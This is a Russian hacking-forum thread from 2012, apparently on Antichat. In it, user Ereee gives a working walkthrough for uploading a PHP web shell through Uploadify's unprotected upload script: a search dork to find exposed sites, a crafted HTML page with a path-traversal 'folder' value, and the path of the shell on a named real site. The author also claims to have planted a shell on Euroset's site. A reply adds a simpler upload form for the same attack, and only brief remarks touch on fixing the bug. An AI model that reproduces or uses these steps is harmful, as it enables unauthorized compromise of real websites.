Новости из Блогов Uploadify Remote File Upload

Discussion in 'Мировые новости. Обсуждения.' started by Ereee, 28 Mar 2012.

  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Uploadify Remote File Upload



    Я до этого дня считал, что это 0day =) Потом поискал на сайте "элитного дня". Нашел... Но там по другому все написано. Поехали!
    Открываем Opera. Для начала по дорку intitle:"Index of uploadify" ищем сайты. Результатов: примерно 10 600 (0,38 сек.) ^__^
    Заходим по любой ссылке. Зашли, например, по ссылке http://parsoniiseo.com/uploadify/
    На их сайте (http://www.uploadify.com/documentation/) любезно дан "exploit", точнее код установки uploadify:
    Code:
    <script type="text/javascript" src="/uploadify/jquery-1.4.2.min.js"></script>
    <script type="text/javascript" src="/uploadify/swfobject.js"></script>
    <script type="text/javascript" src="/uploadify/jquery.uploadify.v2.1.4.min.js"></script>
    <script type="text/javascript">
    // <![CDATA[
    $(document).ready(function() {
      $('#file_upload').uploadify({
        'uploader'  : '/uploadify/uploadify.swf',
        'script'    : '/uploadify/uploadify.php',
        'cancelImg' : '/uploadify/cancel.png',
        'folder'    : '/uploads',
        'auto'      : true
      });
    });
    // ]]>
    </script>
    --------
    Потом в нужном месте ставим:
    <input id="file_upload" type="file" name="file_upload" />
    
    Правим код, точнее версии jquery как на уязвимом сайте. Так же можно последние версии этих файлов залить себе на хостинг, и не замарачиватся с версиями, а просто ставить ссылку на скрипт на вашем хостинге.
    Открываем исходный код страницы(Ctrl+U). Меняем...
    Исходный код у меня получился таким:
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <HTML>
     <HEAD>
      <TITLE>Index of /uploadify</TITLE>
    <script type="text/javascript" src="jquery-1.4.2.min.js"></script>
    <script type="text/javascript" src="swfobject.js"></script>
    <script type="text/javascript" src="jquery.uploadify.v2.1.4.min.js"></script>
    <script type="text/javascript">
    // <![CDATA[
    $(document).ready(function() {
      $('#file_upload').uploadify({
        'uploader'  : 'uploadify.swf',
        'script'    : 'uploadify.php',
        'cancelImg' : 'cancel.png',
        'folder'    : '../imgadmin/phpimages/',
        'auto'      : true
      });
    });
    // ]]>
    </script>
     </HEAD>
     <BODY>
    <input id="file_upload" type="file" name="file_upload" />
    <h1>By Ereee</h1>
    </body></html>
    Перейдем по ссылке:
    http://parsoniiseo.com/imgadmin/phpimages/
    Появился файл bbd680520ce0807131688e164c11fdcf.php. Опять перейдем, это ведь наш шелл)
    Всем спасибо! Читайте мой блог =)

    Оригинал по адресу: http://dbitems.ru/blog/?x=entry:entry120328-063852
     
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Однозначно плюсую!
     
  3. xxddz

    xxddz Elder - Старейшина

    Joined:
    2 Oct 2009
    Messages:
    706
    Likes Received:
    365
    Reputations:
    162
    Весьма интересно.
     
  4. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    как прикрыть багу ?
     
  5. Lostnull

    Lostnull New Member

    Joined:
    15 Jan 2012
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    0day всех нуллдеев
    http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Uploadify
    Как такое можно писать, точнее для кого?
     
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Поставь фильтры, отредактировав uploadify.php.
    Я уже писал, что баян. Но там не написано как заливать, ведь, если смотреть, то на многих сайтах нет папки /files/.

    P.S. Забыл добавить. Я этим способом на сайт Евросети шелл заливал. Т.е. этот недочет еще многие не исправили.
     
    #6 Ereee, 29 Mar 2012
    Last edited: 29 Mar 2012
  7. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Фильтровать от нулл байта, а дальше, там код закоментирован который проверяет расширение.
     
  8. mr.Penguin

    mr.Penguin Member

    Joined:
    8 Mar 2012
    Messages:
    40
    Likes Received:
    37
    Reputations:
    74
    Радуешь с каждым днём, молодец!
    Code:
    Вы должны добавить репутацию кому-то еще, прежде чем сможете снова добавить ее Ereee.
     
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Зиродей ороро.
    Зачем весь этот говнокод? Все это можно заменить на простейшую форму без всяких скриптов.
    HTML:
    <form action="http://example.com/uploadify.php" method="post" enctype="multipart/form-data">
    File: <input type="file" name="Filedata"><br />Folder: <input type="text" name="folder">
    <input type="submit" value="Submit"></form>
    
     
  10. Lostnull

    Lostnull New Member

    Joined:
    15 Jan 2012
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Было бы интересно почитать, баги в скриптах кмс'ок, которые ты именно нашел, причем там не инклуд, иньект, а например код экзэкъюшен. Причем подробно, как происходил анализ, на что в первую очередь обратил внимание, именно теорию анализа мышления хотелось бы почитать.
     
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Сегодня нашел 0day в протоколе FTP. Оказывается, через него можно залить файлы на сайт!
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Цитирую:
    Code:
    Я до этого дня [COLOR=Red]считал[/COLOR], что это 0day =)
     
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Там даже скачивать можно, как оказалось :D
     
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    А так же удалять и переименовывать.
    M_Script, крутой 0day, конечно. Вот только без пароля никуда не годится. :p
     
  15. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    О привате промолчим :D
     
  16. TohaK

    TohaK Banned

    Joined:
    16 Aug 2011
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    Советую при запросах в Гугле добавлять какое-нб слово, тогда не придется листать страницы до n-ой.